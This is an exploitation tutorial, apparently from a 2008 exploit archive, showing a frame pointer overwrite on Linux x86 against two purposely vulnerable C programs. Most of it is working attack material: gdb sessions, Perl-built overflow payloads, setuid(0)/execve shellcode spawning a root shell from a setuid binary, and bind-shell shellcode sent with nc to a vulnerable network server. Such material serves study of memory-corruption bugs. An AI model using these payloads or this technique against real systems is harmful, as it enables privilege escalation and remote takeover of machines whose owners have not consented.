Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
Frame Pointer Overwrite Demonstration [LINUX]
This paper assumes you have read the proper background information and/or technical details about
the above subject. If not, please do so, because this read does not include key concepts but instead
technical exploitation examples. That being said, enjoy. Knowledge is power.
[PART 1 + LOCAL][PART 1 + LOCAL][PART 1 + LOCAL][PART 1 + LOCAL][PART 1 + LOCAL][PART 1 + LOCAL]
bugs@linux:~$ cat fpo.c
#include <stdio.h>
void die()
{
printf("Protection Enabled!\n");
exit(0);
}
void vuln(char *data)
{
char buf[1024], buf2[12];
int i = 0;
memset(buf, 0, 1024);
if(strlen(data) < sizeof(buf)+sizeof(buf2)+1) { while(*data) buf[i++] = *data++; }
else { die(); }
}
int main(int argc, char *argv[])
{
if(argc < 2) { printf("usage: %s data\n", argv[0]); return 0; }
vuln(argv[1]);
return 0;
}
bugs@linux:~$ gcc -o fpo fpo.c
This program is vulnerable to a buffer overflow. But, there are conditions.
With our environment in consideration, we need atleast 16 bytes over the buffer size to
overwrite the EIP. But this program only allows us to fill the buffer with around 1036 bytes.
If we go over 1036 bytes, it will tell us "Protection Enabled" and goto die(), which will end our program.
Now that you know what we're working with, lets see what we can do.
bugs@linux:~$ ./fpo
usage: ./fpo data
bugs@linux:~$ su
Password:
root@linux:/home/bugs# chown root:root fpo && chmod 4755 fpo
root@linux:/home/bugs# exit
exit
bugs@linux:~$ ls -alh fpo
-rwsr-xr-x 1 root root 8.4K 2008-11-27 03:12 fpo*
bugs@linux:~$ gdb fpo
GNU gdb 6.5
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-linux-linux"...Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) break main
Breakpoint 1 at 0x80484df
(gdb) disas vuln
Dump of assembler code for function vuln:
0x08048464 <vuln+0>: push %ebp
0x08048465 <vuln+1>: mov %esp,%ebp
0x08048467 <vuln+3>: sub $0x428,%esp
0x0804846d <vuln+9>: movl $0x0,0xfffffbe4(%ebp)
0x08048477 <vuln+19>: sub $0x4,%esp
0x0804847a <vuln+22>: push $0x400
0x0804847f <vuln+27>: push $0x0
0x08048481 <vuln+29>: lea 0xfffffbf8(%ebp),%eax
0x08048487 <vuln+35>: push %eax
0x08048488 <vuln+36>: call 0x8048358 <memset@plt>
0x0804848d <vuln+41>: add $0x10,%esp
0x08048490 <vuln+44>: sub $0xc,%esp
0x08048493 <vuln+47>: pushl 0x8(%ebp)
0x08048496 <vuln+50>: call 0x8048318 <strlen@plt>
0x0804849b <vuln+55>: add $0x10,%esp
0x0804849e <vuln+58>: cmp $0x40c,%eax
0x080484a3 <vuln+63>: ja 0x80484d2 <vuln+110>
0x080484a5 <vuln+65>: mov 0x8(%ebp),%eax
0x080484a8 <vuln+68>: cmpb $0x0,(%eax)
0x080484ab <vuln+71>: je 0x80484d7 <vuln+115>
0x080484ad <vuln+73>: mov 0xfffffbe4(%ebp),%eax
0x080484b3 <vuln+79>: lea 0xfffffff8(%ebp),%edx
0x080484b6 <vuln+82>: add %edx,%eax
0x080484b8 <vuln+84>: lea 0xfffffc00(%eax),%edx
0x080484be <vuln+90>: mov 0x8(%ebp),%eax
0x080484c1 <vuln+93>: incl 0x8(%ebp)
0x080484c4 <vuln+96>: mov (%eax),%al
0x080484c6 <vuln+98>: mov %al,(%edx)
0x080484c8 <vuln+100>: lea 0xfffffbe4(%ebp),%eax
0x080484ce <vuln+106>: incl (%eax)
0x080484d0 <vuln+108>: jmp 0x80484a5 <vuln+65>
0x080484d2 <vuln+110>: call 0x8048444 <die>
0x080484d7 <vuln+115>: leave
0x080484d8 <vuln+116>: ret
End of assembler dump.
(gdb) break *vuln+115
Breakpoint 2 at 0x80484d7
(gdb) r `perl -e 'print "A" x 1040'`
Starting program: /home/bugs/fpo `perl -e 'print "A" x 1040'`
Breakpoint 1, 0x080484df in main ()
(gdb) c
Continuing.
Protection Enabled!
Program exited normally.
(gdb) r `perl -e 'print "A" x 1036'`
Starting program: /home/bugs/fpo `perl -e 'print "A" x 1036'`
Breakpoint 1, 0x080484df in main ()
(gdb) x/x $ebp
0xbffff0c8: 0xbffff0e8
*** 0xbffff0e8 --> _init saved ebp
(gdb) x/x $ebp+4
0xbffff0cc: 0x4004728b
*** 0x4004728b --> main()'s return address
(gdb) c
Continuing.
Breakpoint 2, 0x080484d7 in vuln ()
(gdb) x/12x $esp
0xbfffec70: 0x00000000 0x00000000 0x400174dc 0x0000040c
0xbfffec80: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffec90: 0x41414141 0x41414141 0x41414141 0x41414141
*** 0xbfffec90 --> buffer's address
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x0804852c in main ()
(gdb) i r
eax 0xbffff65b -1073744293
ecx 0x414141 4276545
edx 0xbffff09b -1073745765
ebx 0x4015bff0 1075167216
esp 0xbffff0b0 0xbffff0b0
ebp 0x41414141 0x41414141
esi 0xbffff120 -1073745632
edi 0x2 2
eip 0x804852c 0x804852c <main+83>
eflags 0x10282 [ SF IF RF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
We can overflow the buffer, but not enough to overwrite the EIP because of the 'protection' code. But
sometimes control of the EBP leads to control over the EIP as well.
So let's put our information together and see if we can smash this stack.
filler -> _init saved ebp -> main()'s retaddr -> target eip -> buffer's address
[A * 8]->[\xe8\xf0\xff\xbf]->[\x8b\x72\x04\x40]->[\x41\x41\x41\x41 * 254]->[\x90\xec\xff\xbf]
8 bytes 4 bytes 4 bytes 1016 bytes 4 bytes
*Filler doesn't matter much, possibly helpful sometimes; increase target eip count if you don't want to use it*
Total size of payload: 1036 bytes
(gdb) r `perl -e 'print "A" x 8 . "\xe8\xf0\xff\xbf" . "\x8b\x72\x04\x40" . "\x41\x41\x41\x41" x 254 . "\x90\xec\xff\xbf"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bugs/fpo `perl -e 'print "A" x 8 . "\xe8\xf0\xff\xbf" . "\x8b\x72\x04\x40" . "\x41\x41\x41\x41" x 254 . "\x90\xec\xff\xbf"'`
Breakpoint 1, 0x080484df in main ()
(gdb) c
Continuing.
Breakpoint 2, 0x080484d7 in vuln ()
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r
eax 0x0 0
ecx 0xbfffec 12582892
edx 0xbffff09b -1073745765
ebx 0x4015bff0 1075167216
esp 0xbfffec98 0xbfffec98
ebp 0x41414141 0x41414141
esi 0xbffff120 -1073745632
edi 0x2 2
eip 0x41414141 0x41414141
eflags 0x10282 [ SF IF RF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
As you can see, we have now overwritten the both the EBP and the EIP.
Let's get out of here and execute some code =)
(gdb) q
bugs@linux:~$ cat env.c
#include <stdlib.h>
int main(int argc, char *argv[])
{
char *addr;
if(argc < 2) { printf("usage: %s <envvar>\n", argv[0]); return 0; }
addr = getenv(argv[1]);
if(addr == NULL) { printf("[%s] not found!\n", argv[1]); return 0; }
printf("[%s] @ %p\n", argv[1], addr);
return 0;
}
bugs@linux:~$ gcc -o env env.c
bugs@linux:~$ ./env
usage: ./env <envvar>
bugs@linux:~$ export NOPSC=`perl -e 'print "\x90" x 200 . "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
bugs@linux:~$ ./env NOPSC
[NOPSC] @ 0xbffff768
bugs@linux:~$ ./fpo `perl -e 'print "A" x 8 . "\xe8\xf0\xff\xbf" . "\x8b\x72\x04\x40" . "\x68\xf7\xff\xbf" x 254 . "\x90\xec\xff\xbf"'`
sh-3.1# id
uid=0(root) gid=100(users) groups=100(users)
sh-3.1# exit
exit
bugs@linux:~$
[PART 2 + REMOTE][PART 2 + REMOTE][PART 2 + REMOTE][PART 2 + REMOTE][PART 2 + REMOTE][PART 2 + REMOTE]
[Terminal #1]
#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define READSZ 2048
void die(int sock)
{
printf("Protection Enabled!\n");
close(sock);
}
void vuln(char *data, int sock)
{
char buf[1024], buf2[12];
int i = 0;
memset(buf, 0, 1024);
if(strlen(data) < sizeof(buf)+sizeof(buf2)+1) { while(*data) buf[i++] = *data++; }
else if(strlen(data) < sizeof(buf)+sizeof(buf2)+1) { die(sock); }
}
int main(int argc, char *argv[])
{
if(argc < 2) { printf("Usage: %s port\n", argv[0]); return 0; }
int z, cli, serv, port = atoi(argv[1]);
struct sockaddr_in client, server;
server.sin_family = AF_INET;
server.sin_port = htons(port);
server.sin_addr.s_addr = INADDR_ANY;
if((serv = socket(AF_INET, SOCK_STREAM, 0)) == -1) { printf("Error: socket()\n"); return -1; }
if(bind(serv, (struct sockaddr *)&server, sizeof(struct sockaddr)) == -1) { printf("Error: bind()\n"); return -1; }
if(listen(serv, 10) == -1) { printf("Error: listen()\n"); return -1; }
for(;;)
{
cli = accept(serv, (struct sockaddr *)&client, &z);
if(readsock(cli) == -1) { printf("Error: readsock()\n"); close(cli); }
}
return 0;
}
int readsock(int sock)
{
char readbuf[READSZ];
memset(readbuf, 0, READSZ);
read(sock, readbuf, READSZ, 0);
vuln(readbuf, sock);
close(sock);
}
bugs@linux:~$ gcc -o fposerv fposerv.c
bugs@linux:~$ ./fposerv
Usage: ./fposerv port
bugs@linux:~$ gdb fposerv
GNU gdb 6.5
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-linux-linux"...Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) break main
Breakpoint 1 at 0x8048673
(gdb) disas vuln
Dump of assembler code for function vuln:
0x080485da <vuln+0>: push %ebp
0x080485db <vuln+1>: mov %esp,%ebp
0x080485dd <vuln+3>: sub $0x428,%esp
0x080485e3 <vuln+9>: movl $0x0,0xfffffbe4(%ebp)
0x080485ed <vuln+19>: sub $0x4,%esp
0x080485f0 <vuln+22>: push $0x400
0x080485f5 <vuln+27>: push $0x0
0x080485f7 <vuln+29>: lea 0xfffffbf8(%ebp),%eax
0x080485fd <vuln+35>: push %eax
0x080485fe <vuln+36>: call 0x80484a8 <memset@plt>
0x08048603 <vuln+41>: add $0x10,%esp
0x08048606 <vuln+44>: sub $0xc,%esp
0x08048609 <vuln+47>: pushl 0x8(%ebp)
0x0804860c <vuln+50>: call 0x8048448 <strlen@plt>
0x08048611 <vuln+55>: add $0x10,%esp
0x08048614 <vuln+58>: cmp $0x40c,%eax
0x08048619 <vuln+63>: ja 0x8048648 <vuln+110>
0x0804861b <vuln+65>: mov 0x8(%ebp),%eax
0x0804861e <vuln+68>: cmpb $0x0,(%eax)
0x08048621 <vuln+71>: je 0x804866b <vuln+145>
0x08048623 <vuln+73>: mov 0xfffffbe4(%ebp),%eax
0x08048629 <vuln+79>: lea 0xfffffff8(%ebp),%edx
0x0804862c <vuln+82>: add %edx,%eax
0x0804862e <vuln+84>: lea 0xfffffc00(%eax),%edx
0x08048634 <vuln+90>: mov 0x8(%ebp),%eax
0x08048637 <vuln+93>: incl 0x8(%ebp)
0x0804863a <vuln+96>: mov (%eax),%al
0x0804863c <vuln+98>: mov %al,(%edx)
0x0804863e <vuln+100>: lea 0xfffffbe4(%ebp),%eax
0x08048644 <vuln+106>: incl (%eax)
0x08048646 <vuln+108>: jmp 0x804861b <vuln+65>
0x08048648 <vuln+110>: sub $0xc,%esp
0x0804864b <vuln+113>: pushl 0x8(%ebp)
0x0804864e <vuln+116>: call 0x8048448 <strlen@plt>
0x08048653 <vuln+121>: add $0x10,%esp
0x08048656 <vuln+124>: cmp $0x40c,%eax
0x0804865b <vuln+129>: ja 0x804866b <vuln+145>
0x0804865d <vuln+131>: sub $0xc,%esp
0x08048660 <vuln+134>: pushl 0xc(%ebp)
0x08048663 <vuln+137>: call 0x80485b4 <die>
0x08048668 <vuln+142>: add $0x10,%esp
0x0804866b <vuln+145>: leave
0x0804866c <vuln+146>: ret
End of assembler dump.
(gdb) break *vuln+145
Breakpoint 2 at 0x804866b
(gdb) r 5555
Starting program: /home/bugs/fposerv 5555
Breakpoint 1, 0x08048673 in main ()
(gdb) x/x $ebp
0xbffff4c8: 0xbffff4e8
(gdb) x/x $ebp+4
0xbffff4cc: 0x4004728b
(gdb) c
Continuing.
[Terminal #2]
bugs@linux:~$ perl -e 'print "\x44\x43\x42\x41" x 259' | nc localhost 5555
[Terminal #1]
Breakpoint 2, 0x0804866b in vuln ()
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x08048825 in readsock ()
(gdb) i r
eax 0xbffff05c -1073745828
ecx 0x0 0
edx 0xbfffec3b -1073746885
ebx 0x4015bff0 1075167216
esp 0xbfffec44 0xbfffec44
ebp 0x41424344 0x41424344
esi 0xbffff520 -1073744608
edi 0x2 2
eip 0x8048825 0x8048825 <readsock+83>
eflags 0x10296 [ PF AF SF IF RF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
(gdb) x/12x $esp
0xbfffec44: 0x00000007 0x00000800 0x00000000 0x41424344
0xbfffec54: 0x41424344 0x41424344 0x41424344 0x41424344
0xbfffec64: 0x41424344 0x41424344 0x41424344 0x41424344
(gdb) x/x 0xbfffec50
0xbfffec50: 0x41424344
(gdb) c
Continuing.
Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
(gdb) r 5555
Starting program: /home/bugs/fposerv 5555
Breakpoint 1, 0x08048673 in main ()
(gdb) c
Continuing.
[Terminal #2]
bugs@linux:~$ perl -e 'print "A" x 8 . "\xe8\xf4\xff\xbf" . "\x8b\x72\x04\x40" . "\x44\x43\x42\x41" x 254 . "\x50\xec\xff\xbf"' | nc localhost 5555
[Terminal #1]
Breakpoint 2, 0x0804866b in vuln ()
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) x/x 0xbfffec50
0xbfffec50: 0x41414141
(gdb) x/x 0xbfffec60
0xbfffec60: 0x41424344
(gdb) c
Continuing.
Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
(gdb) r 5555
Starting program: /home/bugs/fposerv 5555
Breakpoint 1, 0x08048673 in main ()
(gdb) c
Continuing.
[Terminal #2]
bugs@linux:~$ perl -e 'print "A" x 8 . "\xe8\xf4\xff\xbf" . "\x8b\x72\x04\x40" . "\x44\x43\x42\x41" x 254 . "\x60\xec\xff\xbf"' | nc localhost 5555
[Terminal #1]
Program received signal SIGSEGV, Segmentation fault.
0x41424344 in ?? ()
(gdb) c
Continuing.
Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
(gdb)
[Terminal #2]
bugs@linux:~$ pcalc 254*4 (previous return address buffer)
1016 0x3f8 0y1111111000
bugs@linux:~$ pcalc 1016-800 (minus nops)
216 0xd8 0y11011000
bugs@linux:~$ pcalc 216-84 (minus shellcode)
132 0x84 0y10000100
bugs@linux:~$ pcalc 132/4 (new return address space)
33 0x21 0y100001
bugs@linux:~$
[Terminal #1]
(gdb) r 5555
Starting program: /home/bugs/fposerv 5555
Breakpoint 1, 0x08048673 in main ()
(gdb) c
Continuing.
[Terminal #2]
bugs@linux:~$ perl -e 'print "A" x 8 . "\xe8\xf4\xff\xbf" . "\x8b\x72\x04\x40" . "\x44\x43\x42\x41" x 33 . "\x90" x 800 . "\x6a\x66\x58\x6a\x01\x5b\x99\x52\x53\x6a\x02\x89\xe1\xcd\x80\x52\x43\x68\xff\x02\xce\xec\x89\xe1\x6a\x10\x51\x50\x89\xe1\x89\xc6\xb0\x66\xcd\x80\x43\x43\xb0\x66\xcd\x80\x52\x56\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x60\xec\xff\xbf"' | nc localhost 5555
[Terminal #1]
Breakpoint 2, 0x0804866b in vuln ()
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x41424344 in ?? ()
(gdb) x/250x $esp
0xbfffec68: 0x41424344 0x41424344 0x41424344 0x41424344
0xbfffec78: 0x41424344 0x41424344 0x41424344 0x41424344
0xbfffec88: 0x41424344 0x41424344 0x41424344 0x41424344
0xbfffec98: 0x41424344 0x41424344 0x41424344 0x41424344
0xbfffeca8: 0x41424344 0x41424344 0x41424344 0x41424344
0xbfffecb8: 0x41424344 0x41424344 0x41424344 0x41424344
0xbfffecc8: 0x41424344 0x41424344 0x41424344 0x41424344
0xbfffecd8: 0x41424344 0x41424344 0x41424344 0x90909090
0xbfffece8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffecf8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffed08: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffed18: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffed28: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffed38: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffed48: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffed58: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffed68: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffed78: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffed88: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffed98: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffeda8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffedb8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffedc8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffedd8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffede8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffedf8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffee08: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffee18: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffee28: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffee38: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffee48: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffee58: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffee68: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffee78: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffee88: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffee98: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffeea8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffeeb8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffeec8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffeed8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffeee8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffeef8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffef08: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffef18: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffef28: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffef38: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffef48: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffef58: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffef68: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffef78: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffef88: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffef98: 0x90909090 0x90909090 0x90909090 0x90909090
---Type <return> to continue, or q <return> to quit---
0xbfffefa8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffefb8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffefc8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffefd8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffefe8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffeff8: 0x90909090 0x90909090 0x90909090 0x6a58666a
0xbffff008: 0x52995b01 0x89026a53 0x5280cde1 0x02ff6843
0xbffff018: 0xe189ecce 0x5051106a 0xc689e189 0x80cd66b0
0xbffff028: 0x66b04343 0x565280cd 0xb043e189 0x8980cd66
0xbffff038: 0xb0c389d9 0x80cd493f 0x52f8e241 0x732f6e68
0xbffff048: 0x2f2f6868 0xe3896962
(gdb) d
Delete all breakpoints? (y or n) y
(gdb) r 5555
Starting program: /home/bugs/fposerv 5555
[Terminal #2]
Lets break down our final payload:
filler -> _init saved ebp -> main()'s retaddr -> target eip -> nops -> shellcode -> buffer's address
[A * 8]->[\xe8\xf0\xff\xbf]->[\x8b\x72\x04\x40]->[\x08\xee\xff\xbf * 33]->[\x90 * 800]->[\x6a.....\x80]->[\x90\xec\xff\xbf]
8 bytes 4 bytes 4 bytes 132 bytes 800 bytes 84 bytes 4 bytes
Total size of payload: 1036 bytes
bugs@linux:~$ perl -e 'print "A" x 8 . "\xe8\xf4\xff\xbf" . "\x8b\x72\x04\x40" . "\x08\xee\xff\xbf" x 33 . "\x90" x 800 . "\x6a\x66\x58\x6a\x01\x5b\x99\x52\x53\x6a\x02\x89\xe1\xcd\x80\x52\x43\x68\xff\x02\xce\xec\x89\xe1\x6a\x10\x51\x50\x89\xe1\x89\xc6\xb0\x66\xcd\x80\x43\x43\xb0\x66\xcd\x80\x52\x56\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x60\xec\xff\xbf"' | nc localhost 5555
[CRTL+C]
bugs@linux:~$ netstat -antp | grep 52972
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
tcp 0 0 0.0.0.0:52972 0.0.0.0:* LISTEN 7089/fposerv
bugs@linux:~$ nc localhost 52972
[Terminal #1]
Program received signal SIGTRAP, Trace/breakpoint trap.
0x400007b0 in _start () from /lib/ld-linux.so.2
(gdb) c
Continuing.
[Terminal #2]
id
uid=1000(bugs) gid=100(users) groups=100(users)
exit
bugs@linux:~$
Questions. Comments. Concerns. --> 0xjbrown41@gmail.com
# milw0rm.com [2008-12-01]